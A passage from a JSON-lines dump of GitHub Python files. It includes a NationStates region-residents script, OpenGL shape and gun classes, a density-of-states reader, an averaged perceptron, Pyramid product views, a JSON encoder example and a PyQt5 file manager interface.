Retrieve residents\n return set(requester.region(region).nations()) & set(\n requester.wa().shard(\"members\").split(\",\")\n )\n\n\ndef nation_url(nation: str) -> str:\n \"\"\"Format a nation into a URL.\"\"\"\n\n return f\"https://www.nationstates.net/nation={nsapi.clean_format(nation)}\"\n\n\ndef listNationCodes(nations: Iterable[str]) -> str:\n \"\"\"Returns a string containing the given nations formmatted into nscode links,\n conjoined into a single line.\n \"\"\"\n\n return \"\".join(f\"[nation]{nation}[/nation]\" for nation in nations)\n\n\ndef low_endorsements(\n requester: nsapi.NSRequester, region: str, count: int = 20\n) -> Collection[str]:\n \"\"\"\n Finds nations with low endorsements.\n\n Searches the nation dump for WA nations in the specified region\n with less endorsements than the given count.\n \"\"\"\n\n filtered = []\n\n # Squash casing on region\n lower_region = region.lower()\n\n # Search for matching nations\n for nation in requester.dumpManager().nations():\n if (\n # Compare regions, case insensitive\n nation.region.lower() == lower_region\n # Check that in WA\n and nation.WAStatus.startswith(\"WA\")\n # Check that endorsements are under the specified level\n and len(nation.endorsements) <= count\n ):\n # Save to return at end of search\n filtered.append(nation.name)\n\n return filtered\n\n\ndef main() -> None:\n \"\"\"Main function, mainly for testing purposes.\"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Collects various information on WA residents of a region.\"\n )\n\n parser.add_argument(\"region\", help=\"Region to search.\")\n\n parser.add_argument(\n \"-c\",\n \"--count\",\n help=\"Only collect residents with less endorsements than this.\",\n type=int,\n default=None,\n )\n\n parser.add_argument(\n \"-o\", \"--output\", help=\"File name to output to instead of stdout.\", default=None\n )\n\n parser.add_argument(\n \"-f\",\n \"--format\",\n choices=[\"raw\", \"url\", \"bbcode\"],\n default=\"bbcode\",\n help=\"How to format the output.\",\n )\n\n # Parse args\n # Check sys.argv first; if no args provided run interactive mode\n region: str\n count: t.Optional[int]\n output: t.Optional[str]\n form: str\n if len(sys.argv) <= 1:\n # Interactive mode\n region = input(\"Region to search: \")\n count_raw = input(\"Endorsement boundary (type nothing to get all WA): \")\n if count_raw:\n count = int(count_raw)\n else:\n count = None\n output = input(\"File name to output to: \")\n form = \"bbcode\"\n else:\n args = parser.parse_args()\n region = args.region\n count = args.count\n output = args.output\n form = args.format\n\n # Setup requester\n requester = nsapi.NSRequester(config.userAgent)\n\n # Use api if getting all residents\n if not count:\n nations = residents(requester, region)\n # Use dump if filtering\n else:\n nations = low_endorsements(requester, region, count)\n\n output_block: str\n if form == \"url\":\n output_block = \"\\n\".join(map(nation_url, nations))\n elif form == \"bbcode\":\n output_block = listNationCodes(nations)\n else:\n output_block = \"\\n\".join(nations)\n\n if output:\n with open(output, \"w\", encoding=\"utf-8\") as out_file:\n print(output_block, file=out_file)\n else:\n print(output_block)\n\n\n# Call main if this script is the entrypoint\nif __name__ == \"__main__\":\n main()\n","repo_name":"HN67/nsapi","sub_path":"wa/waresidents.py","file_name":"waresidents.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"4458920588","text":"import numpy as np\nimport pygame as pg\nfrom pyrr import Matrix44\nfrom math import radians\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom helpingFunctions import *\n\nclass Shape:\n def __init__(self, vertices, material, shader, FormatAlign=['in_position'], Format=['3 0'], stride=3, **kargs):\n self.kargs = kargs\n self.material = material\n self.vertices = np.array(vertices, dtype=np.float32)\n self.shader = shader\n self.transform = Matrix44.identity(dtype=np.float32)\n self.scalingFactor = 0.01 if not 'scalingFactor' in self.kargs else self.kargs['scalingFactor']\n self.translated = [0,0,0] if not 'translated' in self.kargs else self.kargs['translated']\n self.FormatAlign = FormatAlign\n self.Format = Format\n self.stride = stride\n self.vao = None\n self.vbo = None\n self.VertxPos = 0 if not 'xpos' in self.kargs else self.kargs['xpos']\n self.VertyPos = self.VertxPos+1 if not 'ypos' in self.kargs else self.kargs['ypos']\n self.VertzPos = self.VertyPos+1 if not 'zpos' in self.kargs else self.kargs['zpos']\n self.name = 'Shape'\n self.initBuffer()\n\n def initBuffer(self):\n self.vao = glGenVertexArrays(1) if not self.vao else self.vao\n glBindVertexArray(self.vao)\n\n self.vbo = glGenBuffers(1) if not self.vbo else self.vbo\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n glBufferData(GL_ARRAY_BUFFER, self.vertices.nbytes, self.vertices, GL_STATIC_DRAW)\n\n for i, ele in enumerate(self.Format):\n vl = ele.split()\n pos = glGetAttribLocation(self.shader.shader_program, self.FormatAlign[i])\n glVertexAttribPointer(pos, int(vl[0]), GL_FLOAT, GL_FALSE, self.stride*4, ctypes.c_void_p(int(vl[1])*4))\n glEnableVertexAttribArray(pos)\n\n def getModelMatrix(self):\n self.rotate(0 if not 'rotatex' in self.kargs else (self.kargs['rotatex']),\n 0 if not 'rotatey' in self.kargs else (self.kargs['rotatey']),\n 0 if not 'rotatez' in self.kargs else (self.kargs['rotatez']))\n self.translate(0 if not 'translatex' in self.kargs else self.kargs['translatex'],\n 0 if not 'translatey' in self.kargs else self.kargs['translatey'],\n 0 if not 'translatez' in self.kargs else self.kargs['translatez'])\n self.scale(1 if not 'scalex' in self.kargs else self.kargs['scalex'],\n 1 if not 'scaley' in self.kargs else self.kargs['scaley'],\n 1 if not 'scalez' in self.kargs else self.kargs['scalez'])\n return self.transform \n\n def translate(self, x=0, y=0, z=0):\n self.transform = Matrix44.from_translation(\n [x, y, z], dtype=np.float32) @ self.transform\n\n def rotate(self, x=0, y=0, z=0, rotateMat = None, offset=0):\n self.translate(*(np.array(self.translated)+offset))\n self.transform = np.array(rotateMat, dtype=np.float32) if rotateMat!=None else Matrix44.from_eulers([radians(x), \n radians(y), \n radians(z)], \n dtype=np.float32) @ self.transform\n self.translate(*list(map(lambda a: -a, np.array(self.translated)+offset)))\n\n def scale(self, x=1, y=1, z=1):\n self.transform = Matrix44.from_scale([x, y, z], dtype=np.float32) @ self.transform\n \n def translateVert(self, x=0, y=0, z=0):\n self.vertices = np.array(list(map(lambda a: [ *a[:self.VertxPos], a[self.VertxPos] + x, a[self.VertyPos] + y, a[self.VertzPos] + z, *a[self.VertzPos+1:]], self.vertices)), dtype=np.float32)\n self.initBuffer()\n\n def getRotationMatrix(self, x, y, z):\n Rx = np.array([ [1, 0, 0],\n [0, np.cos(x), -np.sin(x)],\n [0, -np.sin(x), np.cos(x)]])\n Ry = np.array([ [np.cos(y), 0, np.sin(y)],\n [ 0, 1, 0],\n [np.sin(y), 0, np.cos(y)]])\n Rz = np.array([ [np.cos(z), -np.sin(z), 0],\n [-np.sin(z), np.cos(z), 0],\n [ 0, 0, 1]])\n combined = np.array(np.dot(Rx, np.dot(Ry, Rz)))\n return combined\n\n def rotateVert(self, x=0, y=0, z=0):\n self.translateVert(*self.translated)\n x,y,z = radians(x), radians(y), radians(z)\n combined = self.getRotationMatrix(x,y,z)\n self.vertices = np.array(list(map(lambda a: [ *a[:self.VertxPos], *np.dot([a[self.VertxPos], a[self.VertyPos], a[self.VertzPos]], combined), *a[self.VertzPos+1:]], self.vertices)))\n self.translateVert(*list(map(lambda a: -a, self.translated)))\n\n def scaleVert(self, x=1, y=1, z=1):\n self.vertices = np.array(list(map(lambda a: [ *a[:self.VertxPos], float(a[self.VertxPos]) * x, float(a[self.VertyPos]) * y, float(a[self.VertzPos]) * z, *a[self.VertzPos+1:]], self.vertices)), dtype=np.float32)\n self.initBuffer()\n\n def destroy(self):\n self.shader.destroy()\n self.material.destroy()\n glDeleteBuffers(1, [self.vbo])\n glDeleteVertexArrays(1, [self.vao])\n\nclass Gun(Shape):\n def __init__(self, vertices, material, shader, FormatAlign=['in_position'], Format=['3 0'], stride=3, bulletParams=[None, None], pos=[0,-0.3,3.5], front=[0,0,-1], **kargs):\n super().__init__(vertices, material, shader, FormatAlign, Format, stride, **kargs)\n self.mouse_sensitivity = 0.005\n self.posMotion = 0.08\n self.frontMotion = 0.02\n self.bullets = []\n self.pos = pos\n self.initialPos = pos\n self.front = front\n self.up = [0,1,0]\n self.bulletMat, self.bulletShader = bulletParams \n self.name = 'Gun'\n \n def fire(self):\n new_bullet = Bullet(self.pos, self.front, self.bulletMat, self.bulletShader)\n self.bullets.append(new_bullet)\n\n def getModelMatrix(self):\n self.move()\n return super().getModelMatrix()\n\n def move(self):\n mouse_dx, mouse_dy = pg.mouse.get_rel()\n x = mouse_dx * self.mouse_sensitivity\n y = mouse_dy * self.mouse_sensitivity\n self.rotate(y, x, offset=np.array([0,0,0.1]))\n self.pos[0] += x* self.posMotion\n self.pos[1] -= y* self.posMotion\n bullet_offsetx = 0.03\n bullet_offsety = 0.1 \n self.pos = [self.initialPos[0]+self.pos[0]*bullet_offsetx, \n self.initialPos[1]+(self.pos[1]*bullet_offsety), \n self.pos[2]]\n self.front = np.dot(self.front, self.getRotationMatrix(-y* self.frontMotion,\n x* self.frontMotion*0.5,\n 0))\n\n def destroy(self):\n super().destroy()\n for b in self.bullets:\n b.destroy()\n\nclass Target(Shape):\n def __init__(self, vertices, material, shader, FormatAlign=['in_position'], Format=['3 0'], stride=3, **kargs):\n super().__init__(vertices, material, shader, FormatAlign, Format, stride, **kargs)\n\nclass Bullet(Shape):\n def __init__(self, position, direction, material, shader):\n scale = 0.02\n self.vertices = ScaleObjectVertices(getCombinedVertices(getBulletVertices(), getBulletIndices(), [0.9,0.8,0.4]*18), scale, scale, scale) \n self.vertices = shiftObjectVertices(self.vertices, *position) \n super().__init__(self.vertices, material, shader, ['in_position', 'in_color'], ['3 0', '3 3'], 6, xpos = 0)\n self.direction = np.array(direction, dtype=np.float32)\n self.speed = 0.1\n self.name='bullet'\n\n def move(self):\n if not (self.vertices[0][2]<-3.6):\n self.translateVert(*self.direction * self.speed)\n","repo_name":"M-Usman-Tahir/OpenGL-Python-Mini-Course","sub_path":"Project/Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37822987868","text":"from aimstools.misc import *\nfrom aimstools.density_of_states.base import DOSBaseClass\nfrom aimstools.density_of_states.total_dos import TotalDOS\nfrom aimstools.density_of_states.species_proj_dos import SpeciesProjectedDOS\nfrom aimstools.density_of_states.utilities import DOSSpectrum\n\nimport numpy as np\nimport re\n\n\nclass AtomProjectedDOS(SpeciesProjectedDOS, TotalDOS, DOSBaseClass):\n def __init__(self, outputfile, soc=False) -> None:\n DOSBaseClass.__init__(self, outputfile)\n assert any(\n x\n in [\n \"atom-projected dos\",\n \"atom-projected dos tetrahedron\",\n \"species-projected dos\",\n \"species-projected dos tetrahedron\",\n ]\n for x in self.tasks\n ), \"Atom-projected DOS was not specified as task in control.in .\"\n self.soc = soc\n self.spin = \"none\" if self.control[\"spin\"] != \"collinear\" else \"collinear\"\n self._spectrum = self.set_spectrum(None)\n\n def __repr__(self):\n return \"{}(outputfile={}, spin_orbit_coupling={})\".format(\n self.__class__.__name__, repr(self.outputfile), self.soc\n )\n\n def _read_dosfiles(self):\n if self.spin == \"none\":\n dosfiles = self.get_dos_files(soc=self.soc, spin=\"none\").atom_proj_dos\n dosfiles = list(zip(dosfiles, dosfiles))\n if self.spin == \"collinear\":\n dosfiles_dn = self.get_dos_files(soc=self.soc, spin=\"dn\").atom_proj_dos\n dosfiles_up = self.get_dos_files(soc=self.soc, spin=\"up\").atom_proj_dos\n dosfiles = list(zip(dosfiles_dn, dosfiles_up))\n dos_per_atom = []\n energies = []\n nspins = 2 if self.spin == \"collinear\" else 1\n for i, atom in enumerate(self.structure):\n symbol = atom.symbol\n index = i + 1\n pattern = re.compile(r\".*\" + symbol + \"{0:04d}\".format(index) + r\".*\")\n energies = []\n contributions = []\n for s in range(nspins):\n atom_file = [k[s] for k in dosfiles if re.search(pattern, str(k[s]))]\n assert (\n len(atom_file) == 1\n ), \"Multiple atom-projected dos files found for same atom. Something must have gone wrong. Found: {}\".format(\n atom_file\n )\n array = np.loadtxt(atom_file[0], dtype=float, comments=\"#\")\n ev, co = array[:, 0], array[:, 1:]\n # This ensures that all arrays have shape (nenergies, 7)\n nrows, ncols = co.shape\n array = np.zeros((nrows, 7))\n array[:, :ncols] = co\n energies.append(ev)\n contributions.append(array)\n energies = np.stack(energies, axis=1)\n contributions = np.stack(contributions, axis=1)\n dos_per_atom.append((i, contributions))\n self._dos = (energies, dos_per_atom)\n\n def set_spectrum(self, reference=None):\n if self.dos == None:\n self._read_dosfiles()\n energies, dos_per_atom = self.dos\n self.set_energy_reference(reference, self.soc)\n fermi_level = self.fermi_level.soc if self.soc else self.fermi_level.scalar\n reference, shift = self.energy_reference\n band_extrema = self.band_extrema[:2] if not self.soc else self.band_extrema[2:]\n atoms = self.structure.atoms\n self._spectrum = DOSSpectrum(\n atoms=atoms,\n energies=energies,\n contributions=dos_per_atom,\n type=\"atom\",\n fermi_level=fermi_level,\n reference=reference,\n band_extrema=band_extrema,\n shift=shift,\n )\n\n @property\n def spectrum(self):\n \":class:`aimstools.density_of_states.utilities.DOSSpectrum`.\"\n if self._spectrum == None:\n self.set_spectrum(None)\n return self._spectrum\n","repo_name":"romankempt/aimstools","sub_path":"aimstools/density_of_states/atom_proj_dos.py","file_name":"atom_proj_dos.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"70927157220","text":"# Averaged Perceptron\n\nimport numpy as np\n\ndef positive(x, th, th0):\n return np.sign(th.T@x + th0)\n\ndef averaged_perceptron(data, labels, params = {}, hook = None):\n\n T = params.get('T', 100)\n (d, n) = data.shape\n\n theta = np.zeros((d, 1))\n theta_0 = np.zeros((1, 1))\n theta_s = np.zeros((d, 1))\n theta_0s = np.zeros((1, 1))\n for t in range(T):\n for i in range(n):\n x = data[:,i:i+1]\n y = labels[:,i:i+1]\n if y * positive(x, theta, theta_0) <= 0.0:\n theta = theta + y * x\n theta_0 = theta_0 + y\n theta_s += theta\n theta_0s += theta_0\n return theta_s/(n*T), theta_0s/(n*T)\n\n\n# Evaluating a classifier\n\ndef eval_classifier(learner, data_train, labels_train, data_test, labels_test):\n theta, theta_0 = learner(data_train, labels_train)\n #return score(data_test, labels_test, theta, theta_0)\n\n\n# Evaluating algorithm\ndef eval_learning_alg(learner, data_gen, n_train, n_test, it):\n\n train_data, train_labels = data_gen(n_train)\n score = 0\n\n for i in range(it):\n test_data, test_labels = data_gen(n_test)\n score += eval_classifier(learner, train_data, train_labels, test_data, test_labels)\n\n return score / it\n\n# Cross validation\ndef xval_learning_alg(learner, data, labels, k):\n s_data = np.array_split(data, k, axis=1)\n s_labels = np.array_split(labels, k, axis=1)\n\n score_sum = 0\n for i in range(k):\n data_train = np.concatenate(s_data[:i] + s_data[i+1:], axis=1)\n labels_train = np.concatenate(s_labels[:i] + s_labels[i+1:], axis=1)\n data_test = np.array(s_data[i])\n labels_test = np.array(s_labels[i])\n score_sum += eval_classifier(learner, data_train, labels_train,\n data_test, labels_test)\n return score_sum/k","repo_name":"KarlsonAV/MIT_ML_COURSE","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39706999220","text":"from pyramid.response import Response\nfrom pyramid.view import view_config, view_defaults\nfrom sqlalchemy.exc import IntegrityError\n\nfrom ..models import Product\n\n@view_defaults(renderer='json', route_name='product_collection')\nclass ProductCollectionView(object):\n\tdef __init__(self, request):\n\t\tself.request = request\n\n\t@view_config(request_method='GET')\n\tdef get_all(self):\n\t\trequest = self.request\n\t\treturn request.dbsession.query(Product).all()\n\n\n\t@view_config(request_method='POST')\n\tdef create(self):\n\t\ttry:\n\t\t\trequest = self.request;\n\t\t\tproduct = Product(**request.json_body)\n\t\t\t\n\t\t\trequest.dbsession.add(product)\n\t\t\trequest.dbsession.flush()\n\t\t\trequest.response.status = 201\n\t\t\treturn product\n\t\texcept IntegrityError as error:\n\t\t\tprint(error)\n\t\t\trequest.response.status = 400\n\t\t\treturn {'message' : 'Invalid parameters'}\n\n\n@view_defaults(renderer='json', route_name='product')\nclass ProductView(object):\n\tdef __init__(self, request):\n\t\tself.request = request\n\t\tproduct_id = int(request.matchdict['id'])\n\t\tself.product = request.dbsession.query(Product).get(product_id)\n\n\t@view_config(request_method='GET')\n\tdef get_by_id(self):\n\t\tproduct = self.product\n\t\tif product is not None:\t\n\t\t\treturn product\n\t\telse:\n\t\t\trequest.response.status = 404\n\t\t\treturn {'message' : 'Product not found'}\n\n\t# add put/delete\n","repo_name":"y0devv/labela-proef","sub_path":"labela_proef/views/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30078120129","text":"import json\r\nfrom json import JSONEncoder\r\n\r\n\r\nclass Vehicle:\r\n def __init__(self, name, engine, price):\r\n self.name = name\r\n self.engine = engine\r\n self.price = price\r\n\r\n\r\nclass VehicleEncoder(JSONEncoder):\r\n def default(self, o):\r\n return o.__dict__\r\n\r\n\r\nvehicle = Vehicle(\"Toyota\", \"30.5L\", 32000)\r\n\r\nprint(\"Encode Vehicle Object into JSON\")\r\nvehicleJson = json.dumps(vehicle, indent=4, cls=VehicleEncoder)\r\nprint(vehicleJson)\r\n","repo_name":"yogiibsw/100_Day_Of_Code","sub_path":"Day_29/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"20751855038","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.Qt import QKeySequence, QCursor, QDesktopServices\nimport os, shutil\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1112, 896)\n\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n\n self.leftPane = QtWidgets.QTreeView(self.centralwidget)\n self.leftPane.setGeometry(QtCore.QRect(10, 180, 301, 651))\n self.leftPane.setObjectName(\"leftPane\")\n \n self.mainArea = QtWidgets.QTableView(self.centralwidget)\n self.mainArea.setGeometry(QtCore.QRect(320, 180, 781, 651))\n self.mainArea.setObjectName(\"mainArea\")\n self.mainArea.setShowGrid(False)\n \n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(10, 10, 1091, 161))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.frame.setStyleSheet(\"background: white;\")\n \n self.dark_Button = QtWidgets.QToolButton(self.frame)\n self.dark_Button.setGeometry(QtCore.QRect(10, 120, 51, 41))\n icon8 = QtGui.QIcon()\n icon8.addPixmap(QtGui.QPixmap(\":/icons/icons8-moon-and-stars-50.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.dark_Button.setIcon(icon8)\n self.dark_Button.setIconSize(QtCore.QSize(50, 50))\n self.dark_Button.setObjectName(\"darkButton\")\n self.dark_Button.setStyleSheet(\"border: none;\")\n self.dark_Button.clicked.connect(self.darkMode)\n\n self.back_button = QtWidgets.QToolButton(self.frame)\n self.back_button.setGeometry(QtCore.QRect(70, 120, 51, 41))\n self.back_button.setStyleSheet(\"border: none;\")\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\":/icons/icons8-arrow-pointing-left-64.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.back_button.setIcon(icon)\n self.back_button.setIconSize(QtCore.QSize(30, 30))\n self.back_button.setObjectName(\"back_button\")\n self.back_button.clicked.connect(self.go_back) \n \n self.next_button = QtWidgets.QToolButton(self.frame)\n self.next_button.setGeometry(QtCore.QRect(120, 120, 51, 41))\n self.next_button.setStyleSheet(\"border: none;\")\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(\":/icons/icons8-arrow-64.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.next_button.setIcon(icon1)\n self.next_button.setIconSize(QtCore.QSize(30, 30))\n self.next_button.setObjectName(\"next_button\")\n self.next_button.clicked.connect(self.go_next)\n\n self.prev_button = QtWidgets.QToolButton(self.frame)\n self.prev_button.setGeometry(QtCore.QRect(180, 120, 51, 41))\n self.prev_button.setStyleSheet(\"border: none;\")\n icon2 = QtGui.QIcon()\n icon2.addPixmap(QtGui.QPixmap(\":/icons/icons8-send-letter-48 (1).png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.prev_button.setIcon(icon2)\n self.prev_button.setIconSize(QtCore.QSize(40, 40))\n self.prev_button.setObjectName(\"prev_button\")\n self.prev_button.clicked.connect(self.move_prev)\n \n self.path_label = QtWidgets.QLabel(self.frame)\n self.path_label.setGeometry(QtCore.QRect(260, 127, 47, 31))\n self.path_label.setStyleSheet(\"font-size: 15px; font-family: Bahnschrift SemiBold;\")\n self.path_label.setObjectName(\"path_label\") \n\n self.path = QtWidgets.QTextBrowser(self.frame)\n self.path.setGeometry(QtCore.QRect(310, 130, 781, 31))\n self.path.setObjectName(\"path\")\n \n self.newFolder_button = QtWidgets.QToolButton(self.frame)\n self.newFolder_button.setGeometry(QtCore.QRect(20, 0, 91, 81))\n self.newFolder_button.setStyleSheet(\"border: none;\")\n self.newFolder_button.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/icons8-folder-80.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.newFolder_button.setIcon(icon3)\n self.newFolder_button.setIconSize(QtCore.QSize(60, 60))\n self.newFolder_button.setObjectName(\"newFolder_button\")\n self.newFolder_button.clicked.connect(self.newFolder)\n \n self.newFolder_label = QtWidgets.QLabel(self.frame)\n self.newFolder_label.setGeometry(QtCore.QRect(26, 80, 81, 21))\n self.newFolder_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.newFolder_label.setObjectName(\"newFolder_label\")\n \n self.delete_button = QtWidgets.QToolButton(self.frame)\n self.delete_button.setGeometry(QtCore.QRect(130, 0, 101, 91))\n self.delete_button.setStyleSheet(\"border: none;\")\n self.delete_button.setText(\"\")\n icon4 = QtGui.QIcon()\n icon4.addPixmap(QtGui.QPixmap(\":/icons/icons8-full-recycle-bin-240.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.delete_button.setIcon(icon4)\n self.delete_button.setIconSize(QtCore.QSize(60, 60))\n self.delete_button.setObjectName(\"delete_button\")\n self.delete_button.clicked.connect(self.deleteFileFolder)\n\n self.cut_button = QtWidgets.QToolButton(self.frame)\n self.cut_button.setGeometry(QtCore.QRect(230, 0, 101, 91))\n self.cut_button.setStyleSheet(\"border: none;\")\n self.cut_button.setText(\"\")\n icon5 = QtGui.QIcon()\n icon5.addPixmap(QtGui.QPixmap(\":/icons/icons8-cut-40.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.cut_button.setIcon(icon5)\n self.cut_button.setIconSize(QtCore.QSize(60, 60))\n self.cut_button.setObjectName(\"cut_button\")\n self.cut_button.clicked.connect(self.cut)\n \n self.copy_button = QtWidgets.QToolButton(self.frame)\n self.copy_button.setGeometry(QtCore.QRect(330, 0, 111, 101))\n self.copy_button.setStyleSheet(\"border: none;\")\n self.copy_button.setText(\"\")\n icon6 = QtGui.QIcon()\n icon6.addPixmap(QtGui.QPixmap(\":/icons/icons8-copy-144.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.copy_button.setIcon(icon6)\n self.copy_button.setIconSize(QtCore.QSize(60, 60))\n self.copy_button.setObjectName(\"copy_button\")\n self.copy_button.clicked.connect(self.copy)\n \n self.paste_button = QtWidgets.QToolButton(self.frame)\n self.paste_button.setGeometry(QtCore.QRect(440, 0, 101, 91))\n self.paste_button.setStyleSheet(\"border: none;\")\n self.paste_button.setText(\"\")\n icon7 = QtGui.QIcon()\n icon7.addPixmap(QtGui.QPixmap(\":/icons/icons8-paste-48.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.paste_button.setIcon(icon7)\n self.paste_button.setIconSize(QtCore.QSize(60, 60))\n self.paste_button.setObjectName(\"paste_button\")\n self.paste_button.clicked.connect(self.paste)\n \n self.delete_label = QtWidgets.QLabel(self.frame)\n self.delete_label.setGeometry(QtCore.QRect(160, 80, 51, 21))\n self.delete_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.delete_label.setObjectName(\"delete_label\")\n\n self.cut_label = QtWidgets.QLabel(self.frame)\n self.cut_label.setGeometry(QtCore.QRect(270, 80, 31, 21))\n self.cut_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.cut_label.setObjectName(\"cut_label\")\n \n self.copy_label = QtWidgets.QLabel(self.frame)\n self.copy_label.setGeometry(QtCore.QRect(360, 80, 51, 21))\n self.copy_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.copy_label.setObjectName(\"copy_label\")\n \n self.paste_label = QtWidgets.QLabel(self.frame)\n self.paste_label.setGeometry(QtCore.QRect(470, 80, 51, 21))\n self.paste_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.paste_label.setObjectName(\"paste_label\")\n \n self.line = QtWidgets.QFrame(self.frame)\n self.line.setGeometry(QtCore.QRect(120, 20, 16, 71))\n self.line.setFrameShape(QtWidgets.QFrame.VLine)\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line.setObjectName(\"line\")\n \n self.line_2 = QtWidgets.QFrame(self.frame)\n self.line_2.setGeometry(QtCore.QRect(220, 20, 16, 71))\n self.line_2.setFrameShape(QtWidgets.QFrame.VLine)\n self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_2.setObjectName(\"line_2\")\n \n self.line_3 = QtWidgets.QFrame(self.frame)\n self.line_3.setGeometry(QtCore.QRect(320, 20, 16, 71))\n self.line_3.setFrameShape(QtWidgets.QFrame.VLine)\n self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_3.setObjectName(\"line_3\")\n \n self.line_4 = QtWidgets.QFrame(self.frame)\n self.line_4.setGeometry(QtCore.QRect(430, 20, 16, 71))\n self.line_4.setFrameShape(QtWidgets.QFrame.VLine)\n self.line_4.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_4.setObjectName(\"line_4\")\n \n self.bottom_view = QtWidgets.QTextBrowser(self.centralwidget)\n self.bottom_view.setGeometry(QtCore.QRect(10, 840, 1091, 31))\n self.bottom_view.setObjectName(\"bottom_view\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.bottom_view.setText(\"Developed by AKASH KUMAR SINGH\")\n self.bottom_view.setStyleSheet(\"font-size: 15px; font-family: Lucida Calligraphy; color: red;\")\n self.bottom_view.setAlignment(Qt.AlignCenter)\n self.bottom_view.verticalScrollBar().hide()\n\n self.hideButton = QtWidgets.QPushButton(self.centralwidget)\n self.hideButton.setGeometry(QtCore.QRect(1010, 850, 61, 20))\n self.hideButton.setObjectName(\"hideButton\")\n self.hideButton.setStyleSheet(\"border: none; background: white\")\n self.hideButton.clicked.connect(self.enableHidden)\n \n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.actions()\n self.mainArea.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.mainArea.customContextMenuRequested.connect(self.context_menu)\n self.function()\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"File Manager\", \"File Manager\"))\n self.back_button.setText(_translate(\"MainWindow\", \"...\"))\n self.next_button.setText(_translate(\"MainWindow\", \"...\"))\n self.path_label.setText(_translate(\"MainWindow\", \"Path\"))\n self.prev_button.setText(_translate(\"MainWindow\", \"...\"))\n self.newFolder_label.setText(_translate(\"MainWindow\", \"New Folder\"))\n self.delete_label.setText(_translate(\"MainWindow\", \"Delete\"))\n self.cut_label.setText(_translate(\"MainWindow\", \"Cut\"))\n self.copy_label.setText(_translate(\"MainWindow\", \"Copy\"))\n self.paste_label.setText(_translate(\"MainWindow\", \"Paste\"))\n\n\n def function(self):\n self.mainModel = QDirModel()\n self.mainModel.setReadOnly(True)\n self.mainModel.setSorting(QDir.DirsFirst | QDir.IgnoreCase | QDir.Name)\n self.mainArea.setModel(self.mainModel)\n self.mainArea.setColumnWidth(0, 300)\n self.mainArea.verticalHeader().hide()\n\n self.dirModel = QFileSystemModel()\n self.dirModel.setReadOnly(True)\n self.dirModel.setRootPath(QDir.rootPath())\n self.dirModel.setFilter(QDir.NoDotAndDotDot | QDir.AllDirs | QDir.Drives)\n self.leftPane.setModel(self.dirModel)\n self.leftPane.hideColumn(1)\n self.leftPane.hideColumn(2)\n self.leftPane.hideColumn(3)\n self.leftPane.setHeaderHidden(True)\n\n # Prequisites for move_back.\n self.prev_path = []\n self.curr = -1\n self.temp = \"\"\n self.cut_flag = False\n self.darkMode_flag = False\n self.hiddenEnabled = False\n\n self.leftPane.clicked.connect(self.left_to_main)\n self.mainArea.doubleClicked.connect(self.double_main)\n\n def path_left(self):\n self.index = self.leftPane.currentIndex()\n self.path_address = self.dirModel.filePath(self.index)\n try:\n if self.path_address != self.prev_path[self.curr]:\n 